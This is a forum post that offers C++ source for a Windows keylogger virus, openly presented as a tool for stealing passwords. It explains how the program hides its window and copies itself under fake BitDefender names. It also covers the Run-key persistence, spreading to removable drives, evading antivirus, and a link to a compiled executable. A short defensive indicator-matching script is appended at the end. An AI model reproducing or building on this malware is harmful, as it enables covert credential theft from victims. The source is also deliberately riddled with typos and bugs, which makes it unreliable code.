
Sec_rity without U

virus in c++ | GreenPoison
greenpoison | Date: Tuesday, 2011-11-29, 2:57 PM | Message # 1
This virus could be used as a hacking tool to log people's passwords and hack mails or any password-protected accounts.

Quote
#include <windows.h>
#include <Winuser.h>
#include <string>
#include <fstream>

string Getkeypress(int keypress)
{
string tempkeypress = "";

if (keypress == 8)
tempkeypress = "[delete]";
else if (keypress == 13)
tempkeypress = "\n"
else if (keypress == 32)
tempeypress = " "
else if (keypress == VK_PAUSE)
tempkeypress = "[PAUSE]";
else if (keypress == VK_CAPITAL)
tempkeypress = "[CAPITAL]";
else if (keypress == VK_SHIFT)
tempkeypress = "[SHIFT]";
else if (keypress == VK_TAB)
tempkeypress = "[TABULATOR]";
else if (keypress == VK_CONTROL)
tempkeypress = "[CTRL]";
else if (keypress == VK_ESCAPE)
tempkeypress = "[ESCAPE]";
else if (keypress == VK_END)
tempkeypress = "[END]";
else if (keypress == VK_HOME)
tempkeyress = "[HOME]";
else if (keypress == VK_LEFT)
tempkeypress = "[left]";
else if (keypress == VK_RIGHT)
tempkeypress = "[right]";
else if (keypress == VK_UP)
tempkeypress = "[UP]";
else if (keypress == VK_DOWN)
tempkeypress = "[DOWN]";
else if (keypress == VK_SNAPSHOT)
tempkeypress = "[SNAPSHOT]";
else if (keypress == VK_NUMLOCK)
tempkeypress = "[NUMLOCK]";
else if (keypress == 190 || keypress == 110)
tempkeypress = ".";
else if (keypress >=96 && keypress <= 105)
tempkypress = keypress-48;
else if (keypress > 47 && keypress < 60)
tempkeypress = keypress;
if (keypress != VK_LBUTTON || keypress != VK_RBUTTON)
{
if (keypress > 64 && keypress < 91)
{
if (GetkeypressState(VK_CAPITAL))
tempkeypress = keypress;
else
{
keypress = keypress + 32;
tempkeypress = keypress;
}
}
}

return tempkeypress;
}
int main()
{

HWND hide;
char system[TOT_SIZ],system2[TOT_SIZ];
HKEY stup,fixstup;
TCHAR SIZ[TOT_SIZ];
char temprot[TOT_SIZ];
TCHAR FIXSTUPPATH[TOT_SIZ+12]="\\BitDefender Updates.exe";
char LOCATE[TOT_SIZ];/*creating hide */
AllocConsole();
hide=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(hide,0);
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,LOCATE,sizeof(LOCATE));
GetModuleFileName(NULL,SIZ,TOT_SIZ);
GetSystemDirectory(system,sizeof(system));
GetSystemDirectory(system2,sizeof(system2));
//WRT 2SYS DRV AL PSBL DRV ONS
//temprot[0]=system[0];
//std::strcat(temprot,":\\Program Files\\BitDefender\\BitDefender Updates.exe");
std::strcat(system,"\\BitDefenderUpdates.exe");
//std::strcat(system2,"\\drveprotect.exe");
std::strcat(system2,FIXSTUPPATH);
CopyFile(LOCATE,temprot,false);
CopyFile(LOCATE,system,false);
CopyFile(LOCATE,system2,false);
CopyFile(LOCATE,"E:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"F:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"G:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"H:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"I:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"J:\\DO NOT OPEN.EXE",false);
CopyFile(LOCATE,"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\BITDEFENDER_UPDATE.exe",false);
CopyFile(LOCATE,"C:\\SAS\\BITDEFENDER_UPDATE.exe",false);
std::string Filename = "C:\\SAS.txt";
/*srt up*/
RegOpenkey(Hkeypress_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",

&stup);
//st fix
RegOpenkey(Hkeypress_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",

&fixstup);
//ste fst
RegSetValueEx(fixstup,
"BIT DEFENDER UPDATES ",
0,

RE_SZ,
(LPBYTE)system2,
sizeof(system2));
//stup fixed
RegSetValueEx(stup,
"BIT DEFENDER UPDATES",
0,
REG_SZ,
(LPBYTE)SIZ,
sizeof(SIZ));

/* Close the keypress. */
RegClosekeypress(stup);
RegClosekeypress(fixstup);
std::string TempString =
Fstream FStream;
FStream.pen(Filename., std::fstream::out | std::fstream:);
//FStream.write(
while(1==1)
{

Sleep(3);

for(int i = 8; i < 191; i++)
{
if(GetAsynckeypressState(i)&1 ==1)
{
TempString = Getkeypress (i);

FStream.write(TempString.c_str(), TempString.size());
FStream.close();
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
}
}
}
}


Pls learn C (not 16 bit) and Windows C++ before reading on. Get the Win help file for reference.
The first function is the keylogger part (payload), which simply logs keystrokes:
Getkeypress(int keypress)
GetAsynckeypressState: this module gets the state of each key, which is passed over to our function. The int ASCII value of the keys is converted to strings and saved in a file in C:\SAS.TXT
PS: This is not a good method for making a keylogger, but preferably the first and easy option. Piping out the keystrokes using keyboard hooks is the best method for doing it (Google for it).

***********Then the Main Function the heart of the Virus*************
What it does:
1) Getting the handle to the window created, using HWND
FindWindowA("ConsoleWindowClass",NULL);
2) Registry entry values, HKEY

*********Then the HIDE HANDLE to handle the virus******************
3) Using the handle obtained in "HIDE" we will set it to be hidden so that it will run in the background but not be visible.
GetModuleFileName(GetModH,LOCATE,sizeof(LOCATE));
4) Used to get the current path handle for moving it from the current position to another
5) GetModuleFileName
Used to get the current system directory; it differs depending on the installation of Windows on different drives.

*********VICTIMS SYSTEM FILE LOCATION***************
6) Once after getting the system directory, e.g. C:\WINDOWS\SYSTEM32
7) I append the path of the virus copy, C:\WINDOWS\SYSTEM32 + BitDefenderUpdates.exe, using the string cat function
8) Now copy from the current executed path to the new place using CopyFile(LOCATE,temprot,false);
CopyFile(LOCATE,"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\BITDEFENDER_UPDATE.exe",false);

************Breath of Virus*******************
9) Setting it to get autoloaded every time Windows starts: we simply append a few lines to the registry.
We write 2 startup entries, one a link to the current module and one to a fixed path, so as to evade common AV detection.
RegSetValueEx(fixstup,"BIT DEFENDER UPDATES ",0,RE_SZ,(LPBYTE)system2,sizeof(system2));
It's ready

****************The wings and legs of Virus*******************
I'm not including that part as it is simple; just write a text file with autorun entries to the removable drives and hence it will be able to spread

*****************************Other Techniques and Improvements***********************
Just by adding a few more codes you can make it UD by process viewers and task managers
Just by doing a little more research you can make it UD by AV
Instead of the direct startup entry, use a parasitic infection technique to get auto-started. This doesn't check whether a removable media exists.
Add a function to check the presence and then append. The virus may use SHChangeNotifyRegister to get notified of any new drives
You can use SetWindowHookEx() to avoid the infinite loop. Or better, hooking the keyboard driver in kernel

Just copy-paste and compile won't work for these codes as they have some bugs in them, lol. If you really want to make a virus then you may try to investigate and correct those errors. But if you want spoonfeeding then download the compiled exe file from here
Code:

http://rapidshare.com/files/222730177/svchost.exe.html

MD5: 456A68913061CEED3D46FB5E813F7EEB
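
For triage, the artifacts named in the post above (the Run-key value name, the dropped file names, the C:\SAS.txt log file and the listed MD5) can be matched against a host inventory. This is an added example, not part of the original post; the record layout, function names and sample inventory are assumptions constructed for illustration.

```python
import ntpath
# Indicators copied from the post above; nothing beyond the page is assumed.
RUN_KEY = r"software\microsoft\windows\currentversion\run"
RUN_VALUE_NAME = "bit defender updates"
FILE_NAMES = {"bitdefenderupdates.exe", "bitdefender updates.exe",
              "bitdefender_update.exe", "do not open.exe"}
LOG_FILE = r"c:\sas.txt"
MD5 = "456a68913061ceed3d46fb5e813f7eeb"

def norm(path):
    """Strip quotes and whitespace, unify separators, lower-case a Windows path."""
    return ntpath.normpath(path.strip().strip('"').replace("/", "\\")).lower()

def check_run_value(key, name, data):
    """Reasons a Run-key value matches the autostart entries the post describes."""
    if not norm(key).endswith(RUN_KEY):
        return []
    reasons = []
    if name.strip().lower() == RUN_VALUE_NAME:  # one entry has a trailing space
        reasons.append("run value name")
    if ntpath.basename(norm(data)) in FILE_NAMES:
        reasons.append("run value target")
    return reasons

def check_file(path, md5=None):
    """Reasons a file record matches a dropped copy, the log file or the hash."""
    reasons, p = [], norm(path)
    if ntpath.basename(p) in FILE_NAMES:
        reasons.append("dropped file name")
    if p == LOG_FILE:
        reasons.append("keystroke log file")
    if md5 and md5.strip().lower() == MD5:
        reasons.append("md5 match")
    return reasons

def triage(run_values, files):
    """Return (record, reasons) for every inventory record with a match."""
    hits = [(r, check_run_value(*r)) for r in run_values]
    hits += [(f, check_file(*f)) for f in files]
    return [(rec, why) for rec, why in hits if why]

# Constructed sample inventory (not taken from a real host).
RUN = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
SAMPLE_RUN = [(RUN, "BIT DEFENDER UPDATES ", r"C:\WINDOWS\system32\BitDefender Updates.exe"),
              (RUN, "SecurityHealth", r"C:\Windows\System32\SecurityHealthSystray.exe")]
SAMPLE_FILES = [(r"E:\DO NOT OPEN.EXE", None), (r"C:\SAS.txt", None),
                (r"C:\Temp\sample.bin", "456A68913061CEED3D46FB5E813F7EEB"),
                (r"C:\Windows\System32\notepad.exe", None)]
if __name__ == "__main__": print(triage(SAMPLE_RUN, SAMPLE_FILES))
```

Name-based matches are weak on their own, since a trivial rename defeats them; treat them as leads to confirm against the hash and the Run-key target.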
 